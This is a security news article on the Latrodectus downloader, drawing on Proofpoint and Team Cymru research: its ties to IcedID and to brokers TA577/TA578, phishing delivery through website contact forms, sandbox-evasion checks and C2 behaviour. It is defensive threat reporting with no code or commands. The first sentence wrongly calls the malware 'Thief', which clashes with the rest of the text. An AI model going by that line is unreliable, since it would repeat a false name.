Threat hunters have discovered a new malware called Thief which has been distributed as part of email phishing campaigns since at least the end of November 2023.
“Latrodectus is an emerging downloader with various sandbox evasion capabilities,” researchers from Proofpoint and Team Cymru said in a joint analysis published last week, adding that it is designed to retrieve payloads and execute arbitrary commands.
There is evidence to suggest that the malware is likely written by the same threat actors behind the IcedID malware, with the downloader used by Initial Access Brokers (IABs) to facilitate the distribution of other malware.
Latrodectus has been linked primarily to two different IABs tracked by Proofpoint under the names TA577 (aka Water Curupira) and TA578, the former of which has also been linked to the distribution of QakBot and PikaBot.
As of mid-January 2024, it has been used almost exclusively by TA578 in email threat campaigns, in some cases transmitted via a DanaBot infection.
TA578, known to be active since at least May 2020, has been linked to email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee.
Attack chains exploit contact forms on websites to send legal threats alleging copyright infringement to targeted organizations. Links embedded in messages direct recipients to a fake website to trick them into downloading a JavaScript file responsible for launching the main payload using msiexec.
“Latrodectus will publish encrypted system information to the command and control (C2) server and request the bot to be downloaded,” the researchers said. “Once the bot registers with C2, it sends command requests from C2.”
It also comes with features to detect if it is running in a sandbox environment by checking if the host has a valid MAC address and there are at least 75 processes running on systems running Windows 10 or later.
As is the case with IcedID, Latrodectus is designed to send registration information in a POST request to the C2 server where the fields are HTTP parameters strung together and encrypted, after which it waits for further instructions from the server.
The commands allow the malware to enumerate files and processes, execute binaries and DLLs, execute arbitrary directives via cmd.exe, update the bot, and even stop a running process.
Further examination of the attacker’s infrastructure reveals that the first C2 servers went live on September 18, 2023. These servers, in turn, are configured to communicate with an upstream Tier 2 server installed around August 2023.
Latrodectus’s connections to IcedID arise from the T2 server “maintaining connections to the backend infrastructure associated with IcedID” and the use of jump boxes previously associated with IcedID operations.
“Latrodectus will be increasingly used by financially motivated threat actors across the criminal landscape, particularly those previously distributing IcedID,” Team Cymru assessed.